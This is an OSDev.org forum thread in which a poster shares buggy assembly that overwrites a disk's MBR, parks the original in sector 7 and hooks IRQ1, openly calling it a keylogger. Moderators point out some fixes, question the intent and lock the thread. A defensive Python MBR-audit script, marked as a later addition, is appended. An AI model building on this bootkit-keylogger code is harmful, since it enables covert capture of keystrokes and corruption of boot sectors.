OSDev.org

The Place to Start for Operating System Developers

All times are UTC - 6 hours




This topic is locked, you cannot edit posts or make further replies.  [ 12 posts ]
 Post subject: hook irq1 installed at MBR
PostPosted: Wed Jan 24, 2018 7:46 am 

Joined: Wed Jan 24, 2018 7:26 am
Posts: 4
I am coding a program that hooks the IRQ 1 and is installed onto the MBR and restores the original MBR that is saved at sector 7; however, the OS doesn't bootstrap. Here is my code:

Code:
org 100h
start:
MOV AX,201H
MOV BX,0E00H
MOV CX,1
MOV DX,80H
INT 13H
MOV AX,301H
MOV CX,7
INT 13H
MOV SI,int9_installer
MOV DI,0E00H
MOV CX,1FDH
REP MOVSB
ES
MOV WORD[0FFEH],0AA55h
MOV AX,301H
MOV CX,1
INT 13H
RET

int9_installer:
cli
push es
mov ax,0
mov es,ax
es
mov cx,[24h]
es
mov dx,[26h]

...

mov cx,0
mov dx,2000h
es
mov [24h],cx
es
mov [26h],dx
pop es
sti
...

mov      si,3100h
mov      al,10h
mov      [si],al
mov      al,0
mov      [si+1],al
mov      al,01
mov      [si+2],al
mov           al,0
mov      [si+3],al
MOV      AX,7C00H
mov      [si+4],ax
mov      ax,0h
mov      [si+6],ax
mov      ax,7
mov      [si+8],ax
xor      ax,ax
mov      [si+0ah],ax
mov      [si+0ch],ax
mov      [si+0eh],ax

mov      ah,42h
mov      dl,80h
INT      13H


JMP           0:7C00H



What is wrong with my code above???


 Post subject: Re: hook irq1 installed at MBR
PostPosted: Wed Jan 24, 2018 10:20 am 
Joined: Sat Mar 31, 2012 3:07 am
Posts: 4204
Location: Chichester, UK
You don't initialize the segment registers, you don't initialize the direction flag, and you set the origin to 100h, which is almost certainly not what you intended. I'm not going to wade through the code to find other mistakes, but those ones need to be corrected first.


 Post subject: Re: hook irq1 installed at MBR
PostPosted: Wed Jan 24, 2018 10:44 am 
Joined: Sun Oct 22, 2006 7:01 am
Posts: 2637
Location: Devon, UK
Hi,

In addition to iansjack's post, we have absolutely no context for the code. You call this a "program". Does that mean that it is *not* running in a freestanding environment (which could also explain the org directive)?

We also don't have a very good idea of what you expect to see compared with what you actually do see. Can you use some other tool to verify that the sectors are on disk where you expect them to be?

Cheers,
Adam


 Post subject: Re: hook irq1 installed at MBR
PostPosted: Wed Jan 24, 2018 11:22 am 

Joined: Wed Jan 24, 2018 7:26 am
Posts: 4
My code is a keylogger that hooks IRQ 1 and is installed onto the MBR, and the original MBR is written at sector 7 to be jumped to after my keylogger is installed. The org 100h directive is because it is written in fasm. How do I set the direction flag, and what value should I set the segment registers to?


 Post subject: Re: hook irq1 installed at MBR
PostPosted: Wed Jan 24, 2018 11:30 am 
Joined: Sat Mar 31, 2012 3:07 am
Posts: 4204
Location: Chichester, UK
I think you need to learn a little more about how the processor works, its state after reset, and the boot sequence before attempting this sort of program. Also, I'm not convinced that you understand the ORG directive.

And, I guess, the question is what are you attempting to achieve by hooking this interrupt. It is, potentially, something that I wouldn't feel comfortable helping with.


 Post subject: Re: hook irq1 installed at MBR
PostPosted: Wed Jan 24, 2018 9:58 pm 
Joined: Sat Jan 15, 2005 12:00 am
Posts: 8561
Location: At his keyboard!
Hi,

Apolo wrote:
My code is a keylogger that hooks IRQ 1 and is installed onto the MBR, and the original MBR is written at sector 7 to be jumped to after my keylogger is installed. The org 100h directive is because it is written in fasm. How do I set the direction flag, and what value should I set the segment registers to?


To clear the direction flag, use the CLD instruction.

The BIOS loads the MBR at "some combination of segment:offset that adds up to 0x0007C00". If you set ORG to 0x0100 (telling the assembler to assume the "offset" for the start of your code will be 0x0100) then you'd need your segments to fulfil the equation "0x0007C00 = (segment / 16) + 0x0100". That means you'd need to set segments to 0x07D0. Note that it's much easier to set ORG to 0x00007C00 and set all segments to zero.

For the rest, for assembly language there are only 2 kinds of bugs - the comments don't describe a correct algorithm, or the instructions don't match the comments. Your code has no comments and therefore your code is 100% bugs.

Finally; don't forget that all sane operating systems dispose of the BIOS early during boot and install their own (protected mode or long mode) device drivers with their own IRQ handlers; so (assuming things like TPM and "secureboot" don't do their job) your code still can't work.


Cheers,

Brendan

_________________
For all things; perfection is, and will always remain, impossible to achieve in practice. However; by striving for perfection we create things that are as perfect as practically possible. Let the pursuit of perfection be our guide.


 Post subject: Re: hook irq1 installed at MBR
PostPosted: Thu Jan 25, 2018 5:19 am 
Joined: Sun Oct 22, 2006 7:01 am
Posts: 2637
Location: Devon, UK
That last point is the most important for a keylogger. Any OS worth its salt will end up reinstalling an IDT and chances are your code will end up in an unmapped memory page anyway.

You'd generally be better off with a hardware key logger but what you are doing may be at best immoral and at worst illegal :!:

Before we go further, could you clarify the intention of what you are doing? If you're just playing with boot code on your own machine then fine.

Cheers,
Adam


 Post subject: Re: hook irq1 installed at MBR
PostPosted: Fri Jan 26, 2018 4:26 am 

Joined: Wed Jan 24, 2018 7:26 am
Posts: 4
I think the BIOS of my PCs is all infected because I tried this simplest code but the PCs still don't bootstrap. See my simplest code:

Code:
start:
MOV AX,201H
MOV BX,0E00H
MOV CX,1
MOV DX,80H
INT 13H
MOV CX,7
MOV AX,301H
INT 13H
MOV CX,1BDH
MOV SI,example
MOV DI,0E00H
REP MOVSB
MOV AX,301H
MOV BX,0E00H
MOV AX,301H
MOV CX,1
INT 13H
RET

example:
MOV AX,201H
PUSH ES
MOV BX,0
MOV ES,BX
MOV BX,7C00H
MOV CX,7
INT 13H
POP ES
cs
jmp bx

codesize:

Aaaaaaaaa! What is the problem with my code? :x


 Post subject: Re: hook irq1 installed at MBR
PostPosted: Fri Jan 26, 2018 5:15 am 
Joined: Sat Mar 31, 2012 3:07 am
Posts: 4204
Location: Chichester, UK
The main problem is that you haven't told us what you are trying to do and why. Until we know that it is unlikely that you will get any further help on this forum. It's devoted to OS development, not hacking.


 Post subject: Re: hook irq1 installed at MBR
PostPosted: Fri Jan 26, 2018 5:24 am 
Joined: Sun Oct 22, 2006 7:01 am
Posts: 2637
Location: Devon, UK
You have one more attempt at explaining why you are doing this before the thread gets locked. If you are doing this for legit reasons, it sounds like an interesting problem to tackle, but we will also need more of a technical explanation. A bug in your code or methodology is much more likely than your BIOS being infected.

Cheers,
Adam


 Post subject: Re: hook irq1 installed at MBR
PostPosted: Fri Jan 26, 2018 5:31 am 

Joined: Wed Jan 24, 2018 7:26 am
Posts: 4
Summary:

I am trying to bootstrap from sector 7, which is where the original MBR is written. Can someone help me?? I am desperate!


 Post subject: Re: hook irq1 installed at MBR
PostPosted: Fri Jan 26, 2018 6:02 am 
Joined: Sun Oct 22, 2006 7:01 am
Posts: 2637
Location: Devon, UK
Unfortunately locked as promised. I can only assume that this is being done for nefarious purposes...
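
A defender's check for the disk layout this thread describes (sector 0 replaced, the original MBR parked in a low sector), as an added example that is not part of the original thread: it compares LBA 0 with a recorded SHA-256 baseline and looks for MBR-shaped sectors in the gap before the first partition. The function names, the 63-sector gap and the sample image are assumptions constructed for illustration.

```python
import hashlib
import struct

SECTOR = 512
GAP_END = 63  # assumption: classic layout, first partition starts at LBA 63

def partition_entries(sector):
    """Return [(type, first_lba, count)] if the sector is MBR-shaped, else None."""
    if len(sector) != SECTOR or sector[510:512] != b"\x55\xaa":
        return None
    found = []
    for off in range(446, 510, 16):
        status, ptype = sector[off], sector[off + 4]
        first_lba, count = struct.unpack_from("<II", sector, off + 8)
        if status not in (0x00, 0x80):
            return None  # boot code or data, not a partition entry
        if ptype and count:
            found.append((ptype, first_lba, count))
    return found or None

def audit_boot_area(image, baseline_sha256=None):
    """List findings for LBA 0 and the sectors between it and the first partition."""
    findings = []
    mbr = image[:SECTOR]
    if baseline_sha256 and hashlib.sha256(mbr).hexdigest() != baseline_sha256:
        findings.append("LBA 0: SHA-256 differs from recorded baseline")
    if partition_entries(mbr) is None:
        findings.append("LBA 0: boot signature absent or partition table invalid")
    for lba in range(1, min(GAP_END, len(image) // SECTOR)):
        if partition_entries(image[lba * SECTOR:(lba + 1) * SECTOR]) is not None:
            findings.append(f"LBA {lba}: MBR-shaped sector in the post-MBR gap")
    return findings

def constructed_image(tampered):
    """Constructed sample: 64-sector image, one active type-0x83 partition at LBA 63."""
    mbr = bytearray(SECTOR)
    mbr[446:462] = struct.pack("<B3sB3sII", 0x80, bytes(3), 0x83, bytes(3), 63, 2048)
    mbr[510:512] = b"\x55\xaa"
    image = bytearray(bytes(mbr) + bytes(SECTOR * 63))
    if tampered:  # original parked in the gap, LBA 0 overwritten with filler bytes
        image[6 * SECTOR:7 * SECTOR] = mbr
        image[:SECTOR] = b"\x90" * 510 + b"\x55\xaa"
    return bytes(image), hashlib.sha256(bytes(mbr)).hexdigest()

if __name__ == "__main__":
    for tampered in (False, True):
        img, baseline = constructed_image(tampered)
        print("tampered" if tampered else "clean", audit_boot_area(img, baseline))
```

Treat a hit in the gap as a lead to triage against what is known to be installed, since boot managers and disk-encryption loaders legitimately use these sectors.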

